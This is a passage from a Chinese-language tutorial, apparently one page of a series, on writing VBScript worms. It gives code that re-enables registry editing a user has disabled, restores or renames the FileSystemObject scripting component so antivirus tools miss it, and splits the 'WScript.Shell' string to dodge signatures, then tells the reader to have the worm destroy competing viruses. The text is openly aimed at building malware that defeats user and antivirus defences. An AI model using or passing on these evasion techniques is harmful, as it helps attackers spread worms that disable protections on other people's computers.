5,有些Windows的高级用户为了防范脚本病毒，把注册表中的filesystemobject项给删掉了，新的蠕虫将在执行的开始，
检查系统的filesystemobject项是否存在，如果不存在的话，将重新写入filesystemobject项，当然你也可以将其换个名称，这样有些
杀毒软件就不一定认识了，

以下是代码片段： On Error Resume Next Set wa=CreateObject("WSc"+"ript.S"+"hell") tt=wa.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools") if tt=1 then  wa.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 00000000, "REG_DWORD" end if uu=wa.RegRead("HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}")  if uu="" then uu.RegWrite "HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ" end if

或者

以下是代码片段： a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\CLSID\\" a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\" a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\", "FileSystem Object", "REG_SZ" a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\CLSID\\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ" set yu=createobject("wangzhitong")

以后系统内的filesystemobject项就被替换成了wangzhitong.

6,自己写好的蠕虫怎能让其他的蠕虫一起存在一个系统中呢，所以要劲可能的消灭其他的病毒程序:)
  当然你要先分析那些病毒程序，只要清除掉他们就行了。

上一页  [1] [2] [3] [4] [5] [6] 下一页